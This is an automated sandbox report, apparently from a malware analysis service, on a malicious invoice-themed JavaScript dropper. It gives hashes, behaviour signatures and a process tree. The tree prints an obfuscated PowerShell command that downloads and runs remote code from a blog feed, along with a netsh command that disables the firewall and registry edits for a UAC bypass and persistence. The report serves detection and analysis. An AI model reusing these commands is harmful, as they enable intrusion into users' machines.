Analysis
max time kernel: 143s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20231127-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231127-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-12-2023 05:58
Static task: static1
Behavioral task: behavioral1
Sample: invoice_2566246817.js
Resource: win10v2004-20231127-en
General
Target: invoice_2566246817.js
Size: 106KB
MD5: fc6d7a11059fee2eda2bab5e4c82c839
SHA1: 9907895c521bddd02573ca5e361490f017932dbe
SHA256: 39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c
SHA512: 1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39
SSDEEP: 384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W
Malware Config
Signatures
UAC bypass
Processes: powershell.exe
description | ioc | process
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | powershell.exe
Blocklisted process makes network request 2 IoCs
Processes: powershell.exe
flow | pid | process
- 7 | 2780 | powershell.exe
- 13 | 2780 | powershell.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: wscript.exe
description | ioc | process
- Key value queried | \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation | wscript.exe
Registers COM server for autorun 1 TTPs 2 IoCs
Processes: powershell.exe
description | ioc | process
- Key created | \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | powershell.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | powershell.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes: powershell.exe
description | ioc | process
- Set value (str) | \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deefenasdensossl1 = "schtasks /run /tn Deefenasdensossl1" | powershell.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
- 38 | api.ipify.org
- 39 | api.ipify.org
Suspicious use of SetThreadContext 3 IoCs
Processes: powershell.exe
description | pid | process | target process
- PID 2780 set thread context of 4596 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 set thread context of 60 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 set thread context of 652 | 2780 | powershell.exe | Msbuild.exe
Drops file in Windows directory 1 IoCs
Processes: dw20.exe
description | ioc | process
- File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | dw20.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: dw20.exe, dw20.exe
description | ioc | process
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dw20.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dw20.exe
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | dw20.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dw20.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dw20.exe
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | dw20.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes: dw20.exe, dw20.exe
description | ioc | process
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | dw20.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | dw20.exe
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | dw20.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | dw20.exe
Modifies registry class 3 IoCs
Processes: powershell.exe
description | ioc | process
- Key created | \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | powershell.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | powershell.exe
- Key created | \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | powershell.exe
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes: powershell.exe, RegSvcs.exe
pid | process
- 2780 | powershell.exe
- 2780 | powershell.exe
- 2780 | powershell.exe
- 2780 | powershell.exe
- 2780 | powershell.exe
- 2780 | powershell.exe
- 2780 | powershell.exe
- 4596 | RegSvcs.exe
- 4596 | RegSvcs.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, dw20.exe, dw20.exe, RegSvcs.exe
description | pid | process
- Token: SeDebugPrivilege | 2780 | powershell.exe
- Token: SeIncreaseQuotaPrivilege | 2780 | powershell.exe
- Token: SeSecurityPrivilege | 2780 | powershell.exe
- Token: SeTakeOwnershipPrivilege | 2780 | powershell.exe
- Token: SeLoadDriverPrivilege | 2780 | powershell.exe
- Token: SeSystemProfilePrivilege | 2780 | powershell.exe
- Token: SeSystemtimePrivilege | 2780 | powershell.exe
- Token: SeProfSingleProcessPrivilege | 2780 | powershell.exe
- Token: SeIncBasePriorityPrivilege | 2780 | powershell.exe
- Token: SeCreatePagefilePrivilege | 2780 | powershell.exe
- Token: SeBackupPrivilege | 2780 | powershell.exe
- Token: SeRestorePrivilege | 2780 | powershell.exe
- Token: SeShutdownPrivilege | 2780 | powershell.exe
- Token: SeDebugPrivilege | 2780 | powershell.exe
- Token: SeSystemEnvironmentPrivilege | 2780 | powershell.exe
- Token: SeRemoteShutdownPrivilege | 2780 | powershell.exe
- Token: SeUndockPrivilege | 2780 | powershell.exe
- Token: SeManageVolumePrivilege | 2780 | powershell.exe
- Token: 33 | 2780 | powershell.exe
- Token: 34 | 2780 | powershell.exe
- Token: 35 | 2780 | powershell.exe
- Token: 36 | 2780 | powershell.exe
- Token: SeRestorePrivilege | 636 | dw20.exe
- Token: SeBackupPrivilege | 636 | dw20.exe
- Token: SeRestorePrivilege | 2924 | dw20.exe
- Token: SeBackupPrivilege | 2924 | dw20.exe
- Token: SeBackupPrivilege | 2924 | dw20.exe
- Token: SeBackupPrivilege | 636 | dw20.exe
- Token: SeBackupPrivilege | 636 | dw20.exe
- Token: SeBackupPrivilege | 636 | dw20.exe
- Token: SeBackupPrivilege | 2924 | dw20.exe
- Token: SeBackupPrivilege | 2924 | dw20.exe
- Token: SeDebugPrivilege | 4596 | RegSvcs.exe
- Token: SeIncreaseQuotaPrivilege | 2780 | powershell.exe
- Token: SeSecurityPrivilege | 2780 | powershell.exe
- Token: SeTakeOwnershipPrivilege | 2780 | powershell.exe
- Token: SeLoadDriverPrivilege | 2780 | powershell.exe
- Token: SeSystemProfilePrivilege | 2780 | powershell.exe
- Token: SeSystemtimePrivilege | 2780 | powershell.exe
- Token: SeProfSingleProcessPrivilege | 2780 | powershell.exe
- Token: SeIncBasePriorityPrivilege | 2780 | powershell.exe
- Token: SeCreatePagefilePrivilege | 2780 | powershell.exe
- Token: SeBackupPrivilege | 2780 | powershell.exe
- Token: SeRestorePrivilege | 2780 | powershell.exe
- Token: SeShutdownPrivilege | 2780 | powershell.exe
- Token: SeDebugPrivilege | 2780 | powershell.exe
- Token: SeSystemEnvironmentPrivilege | 2780 | powershell.exe
- Token: SeRemoteShutdownPrivilege | 2780 | powershell.exe
- Token: SeUndockPrivilege | 2780 | powershell.exe
- Token: SeManageVolumePrivilege | 2780 | powershell.exe
- Token: 33 | 2780 | powershell.exe
- Token: 34 | 2780 | powershell.exe
- Token: 35 | 2780 | powershell.exe
- Token: 36 | 2780 | powershell.exe
- Token: SeIncreaseQuotaPrivilege | 2780 | powershell.exe
- Token: SeSecurityPrivilege | 2780 | powershell.exe
- Token: SeTakeOwnershipPrivilege | 2780 | powershell.exe
- Token: SeLoadDriverPrivilege | 2780 | powershell.exe
- Token: SeSystemProfilePrivilege | 2780 | powershell.exe
- Token: SeSystemtimePrivilege | 2780 | powershell.exe
- Token: SeProfSingleProcessPrivilege | 2780 | powershell.exe
- Token: SeIncBasePriorityPrivilege | 2780 | powershell.exe
- Token: SeCreatePagefilePrivilege | 2780 | powershell.exe
- Token: SeBackupPrivilege | 2780 | powershell.exe
Suspicious use of WriteProcessMemory 38 IoCs
Processes: wscript.exe, powershell.exe, csc.exe, Msbuild.exe, RegSvcs.exe
description | pid | process | target process
- PID 1748 wrote to memory of 2780 | 1748 | wscript.exe | powershell.exe
- PID 1748 wrote to memory of 2780 | 1748 | wscript.exe | powershell.exe
- PID 2780 wrote to memory of 4448 | 2780 | powershell.exe | csc.exe
- PID 2780 wrote to memory of 4448 | 2780 | powershell.exe | csc.exe
- PID 4448 wrote to memory of 2200 | 4448 | csc.exe | cvtres.exe
- PID 4448 wrote to memory of 2200 | 4448 | csc.exe | cvtres.exe
- PID 2780 wrote to memory of 2644 | 2780 | powershell.exe | netsh.exe
- PID 2780 wrote to memory of 2644 | 2780 | powershell.exe | netsh.exe
- PID 2780 wrote to memory of 4596 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 4596 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 4596 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 4596 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 4596 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 4596 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 4596 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 4596 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 60 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 60 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 60 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 60 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 60 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 60 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 60 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 60 | 2780 | powershell.exe | RegSvcs.exe
- PID 2780 wrote to memory of 652 | 2780 | powershell.exe | Msbuild.exe
- PID 2780 wrote to memory of 652 | 2780 | powershell.exe | Msbuild.exe
- PID 2780 wrote to memory of 652 | 2780 | powershell.exe | Msbuild.exe
- PID 2780 wrote to memory of 652 | 2780 | powershell.exe | Msbuild.exe
- PID 2780 wrote to memory of 652 | 2780 | powershell.exe | Msbuild.exe
- PID 2780 wrote to memory of 652 | 2780 | powershell.exe | Msbuild.exe
- PID 2780 wrote to memory of 652 | 2780 | powershell.exe | Msbuild.exe
- PID 2780 wrote to memory of 652 | 2780 | powershell.exe | Msbuild.exe
- PID 652 wrote to memory of 2924 | 652 | Msbuild.exe | dw20.exe
- PID 652 wrote to memory of 2924 | 652 | Msbuild.exe | dw20.exe
- PID 652 wrote to memory of 2924 | 652 | Msbuild.exe | dw20.exe
- PID 60 wrote to memory of 636 | 60 | RegSvcs.exe | dw20.exe
- PID 60 wrote to memory of 636 | 60 | RegSvcs.exe | dw20.exe
- PID 60 wrote to memory of 636 | 60 | RegSvcs.exe | dw20.exe
Processes (tree; [n] is the depth in the process tree, indentation shows parent/child)
[1] C:\Windows\system32\wscript.exe
    Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\invoice_2566246817.js
    PID: 1748
    Signatures:
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))
        PID: 2780
        Signatures:
        - UAC bypass
        - Blocklisted process makes network request
        - Registers COM server for autorun
        - Adds Run key to start application
        - Suspicious use of SetThreadContext
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aw0eaotw\aw0eaotw.cmdline"
            PID: 4448
            Signatures:
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES93A5.tmp" "c:\Users\Admin\AppData\Local\Temp\aw0eaotw\CSC946AF703D23C4F11987A705B173E971.TMP"
                PID: 2200
        [3] C:\Windows\system32\netsh.exe
            Command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
            PID: 2644
            Signatures:
            - Modifies Windows Firewall
        [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            PID: 4596
            Signatures:
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
            PID: 60
            Signatures:
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                Command line: dw20.exe -x -s 776
                PID: 636
                Signatures:
                - Checks processor information in registry
                - Enumerates system info in registry
                - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            PID: 652
            Signatures:
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                Command line: dw20.exe -x -s 780
                PID: 2924
                Signatures:
                - Drops file in Windows directory
                - Checks processor information in registry
                - Enumerates system info in registry
                - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15 (number in parentheses is the count of matching signatures)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (1)
  - Windows Service (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (1)
  - Windows Service (1)
Downloads